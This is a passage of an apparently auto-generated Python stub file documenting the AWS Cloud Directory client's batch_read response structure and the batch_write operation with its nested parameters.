CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
:return: {
'Responses': [
{
'SuccessfulResponse': {
'ListObjectAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'NextToken': 'string'
},
'ListObjectChildren': {
'Children': {
'string': 'string'
},
'NextToken': 'string'
},
'GetObjectInformation': {
'SchemaFacets': [
{
'SchemaArn': 'string',
'FacetName': 'string'
},
],
'ObjectIdentifier': 'string'
},
'GetObjectAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'ListAttachedIndices': {
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
},
'ListObjectParentPaths': {
'PathToObjectIdentifiersList': [
{
'Path': 'string',
'ObjectIdentifiers': [
'string',
]
},
],
'NextToken': 'string'
},
'ListObjectPolicies': {
'AttachedPolicyIds': [
'string',
],
'NextToken': 'string'
},
'ListPolicyAttachments': {
'ObjectIdentifiers': [
'string',
],
'NextToken': 'string'
},
'LookupPolicy': {
'PolicyToPathList': [
{
'Path': 'string',
'Policies': [
{
'PolicyId': 'string',
'ObjectIdentifier': 'string',
'PolicyType': 'string'
},
]
},
],
'NextToken': 'string'
},
'ListIndex': {
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
},
'ListOutgoingTypedLinks': {
'TypedLinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
},
'ListIncomingTypedLinks': {
'LinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
},
'GetLinkAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'ListObjectParents': {
'ParentLinks': [
{
'ObjectIdentifier': 'string',
'LinkName': 'string'
},
],
'NextToken': 'string'
}
},
'ExceptionResponse': {
'Type': 'ValidationException'|'InvalidArnException'|'ResourceNotFoundException'|'InvalidNextTokenException'|'AccessDeniedException'|'NotNodeException'|'FacetValidationException'|'CannotListParentOfRootException'|'NotIndexException'|'NotPolicyException'|'DirectoryNotEnabledException'|'LimitExceededException'|'InternalServiceException',
'Message': 'string'
}
},
]
}
:returns:
(string) --
(string) --
"""
pass
def batch_write(DirectoryArn=None, Operations=None):
"""
Performs all the write operations in a batch. Either all the operations succeed or none.
See also: AWS API Documentation
Exceptions
:example: response = client.batch_write(
DirectoryArn='string',
Operations=[
{
'CreateObject': {
'SchemaFacet': [
{
'SchemaArn': 'string',
'FacetName': 'string'
},
],
'ObjectAttributeList': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ParentReference': {
'Selector': 'string'
},
'LinkName': 'string',
'BatchReferenceName': 'string'
},
'AttachObject': {
'ParentReference': {
'Selector': 'string'
},
'ChildReference': {
'Selector': 'string'
},
'LinkName': 'string'
},
'DetachObject': {
'ParentReference': {
'Selector': 'string'
},
'LinkName': 'string',
'BatchReferenceName': 'string'
},
'UpdateObjectAttributes': {
'ObjectReference': {
'Selector': 'string'
},
'AttributeUpdates': [
{
'ObjectAttributeKey': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'ObjectAttributeAction': {
'ObjectAttributeActionType': 'CREATE_OR_UPDATE'|'DELETE',
'ObjectAttributeUpdateValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
]
},
'DeleteObject': {
'ObjectReference': {
'Selector': 'string'
}
},
'AddFacetToObject': {
'SchemaFacet': {
'SchemaArn': 'string',
'FacetName': 'string'
},
'ObjectAttributeList': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectReference': {
'Selector': 'string'
}
},
'RemoveFacetFromObject': {
'SchemaFacet': {
'SchemaArn': 'string',
'FacetName': 'string'
},
'ObjectReference': {
'Selector': 'string'
}
},
'AttachPolicy': {
'PolicyReference': {
'Selector': 'string'
},
'ObjectReference': {
'Selector': 'string'
}
},
'DetachPolicy': {
'PolicyReference': {
'Selector': 'string'
},
'ObjectReference': {
'Selector': 'string'
}
},
'CreateIndex': {
'OrderedIndexedAttributeList': [
{
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
],
'IsUnique': True|False,
'ParentReference': {
'Selector': 'string'
},
'LinkName': 'string',
'BatchReferenceName': 'string'
},
'AttachToIndex': {
'IndexReference': {
'Selector': 'string'
},
'TargetReference': {
'Selector': 'string'
}
},
'DetachFromIndex': {
'IndexReference': {
'Selector': 'string'
},
'TargetReference': {
'Selector': 'string'
}
},
'AttachTypedLink': {
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'Attributes': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'DetachTypedLink': {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
},
'UpdateLinkAttributes': {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'AttributeUpdates': [
{
'AttributeKey': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'AttributeAction': {
'AttributeActionType': 'CREATE_OR_UPDATE'|'DELETE',
'AttributeUpdateValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
]
}
},
]
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory . For more information, see arns .\n
:type Operations: list
:param Operations: [REQUIRED]\nA list of operations that are part of the batch.\n\n(dict) --Represents the output of a BatchWrite operation.\n\nCreateObject (dict) --Creates an object.\n\nSchemaFacet (list) -- [REQUIRED]A list of FacetArns that will be associated with the object. For more information, see arns .\n\n(dict) --A facet.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n\n\n\nObjectAttributeList (list) -- [REQUIRED]An attribute map, which contains an attribute ARN as the key and attribute value as the map value.\n\n(dict) --The combination of an attribute key and an attribute value.\n\nKey (dict) -- [REQUIRED]The key of the attribute.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nValue (dict) -- [REQUIRED]The value of the attribute.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\nParentReference (dict) --If specified, the parent reference to which this object will be attached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nLinkName (string) --The name of the link.\n\nBatchReferenceName (string) --The batch reference name. See Transaction Support for more information.\n\n\n\nAttachObject (dict) --Attaches an object to a Directory .\n\nParentReference (dict) -- [REQUIRED]The parent object reference.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nChildReference (dict) -- [REQUIRED]The child object reference that is to be attached to the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nLinkName (string) -- [REQUIRED]The name of the link.\n\n\n\nDetachObject (dict) --Detaches an object from a Directory .\n\nParentReference (dict) -- [REQUIRED]Parent reference from which the object with the specified link name is detached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nLinkName (string) -- [REQUIRED]The name of the link.\n\nBatchReferenceName (string) --The batch reference name. See Transaction Support for more information.\n\n\n\nUpdateObjectAttributes (dict) --Updates a given object\'s attributes.\n\nObjectReference (dict) -- [REQUIRED]Reference that identifies the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nAttributeUpdates (list) -- [REQUIRED]Attributes update structure.\n\n(dict) --Structure that contains attribute update information.\n\nObjectAttributeKey (dict) --The key of the attribute being updated.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nObjectAttributeAction (dict) --The action to perform as part of the attribute update.\n\nObjectAttributeActionType (string) --A type that can be either Update or Delete .\n\nObjectAttributeUpdateValue (dict) --The value that you want to update to.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\n\n\nDeleteObject (dict) --Deletes an object in a Directory .\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nAddFacetToObject (dict) --A batch operation that adds a facet to an object.\n\nSchemaFacet (dict) -- [REQUIRED]Represents the facet being added to the object.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n\nObjectAttributeList (list) -- [REQUIRED]The attributes to set on the object.\n\n(dict) --The combination of an attribute key and an attribute value.\n\nKey (dict) -- [REQUIRED]The key of the attribute.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nValue (dict) -- [REQUIRED]The value of the attribute.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\nObjectReference (dict) -- [REQUIRED]A reference to the object being mutated.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nRemoveFacetFromObject (dict) --A batch operation that removes a facet from an object.\n\nSchemaFacet (dict) -- [REQUIRED]The facet to remove from the object.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n\nObjectReference (dict) -- [REQUIRED]A reference to the object whose facet will be removed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nAttachPolicy (dict) --Attaches a policy object to a regular object. An object can have a limited number of attached policies.\n\nPolicyReference (dict) -- [REQUIRED]The reference that is associated with the policy object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object to which the policy will be attached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nDetachPolicy (dict) --Detaches a policy from a Directory .\n\nPolicyReference (dict) -- [REQUIRED]Reference that identifies the policy object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nObjectReference (dict) -- [REQUIRED]Reference that identifies the object whose policy object will be detached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nCreateIndex (dict) --Creates an index object. See Indexing and search for more information.\n\nOrderedIndexedAttributeList (list) -- [REQUIRED]Specifies the attributes that should be indexed on. Currently only a single attribute is supported.\n\n(dict) --A unique identifier for an attribute.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\n\n\nIsUnique (boolean) -- [REQUIRED]Indicates whether the attribute that is being indexed has unique values or not.\n\nParentReference (dict) --A reference to the parent object that contains the index object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nLinkName (string) --The name of the link between the parent object and the index object.\n\nBatchReferenceName (string) --The batch reference name. See Transaction Support for more information.\n\n\n\nAttachToIndex (dict) --Attaches the specified object to the specified index.\n\nIndexReference (dict) -- [REQUIRED]A reference to the index that you are attaching the object to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetReference (dict) -- [REQUIRED]A reference to the object that you are attaching to the index.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nDetachFromIndex (dict) --Detaches the specified object from the specified index.\n\nIndexReference (dict) -- [REQUIRED]A reference to the index object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetReference (dict) -- [REQUIRED]A reference to the object being detached from the index.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\n\n\nAttachTypedLink (dict) --Attaches a typed link to a specified source and target object. For more information, see Typed Links .\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nAttributes (list) -- [REQUIRED]A set of attributes that are associated with the typed link.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nDetachTypedLink (dict) --Detaches a typed link from a specified source and target object. For more information, see Typed Links .\n\nTypedLinkSpecifier (dict) -- [REQUIRED]Used to accept a typed link specifier as input.\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nIdentityAttributeValues (list) -- [REQUIRED]Identifies the attribute value to update.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\n\n\nUpdateLinkAttributes (dict) --Updates a given object\'s attributes.\n\nTypedLinkSpecifier (dict) -- [REQUIRED]Allows a typed link specifier to be accepted as input.\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nIdentityAttributeValues (list) -- [REQUIRED]Identifies the attribute value to update.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value 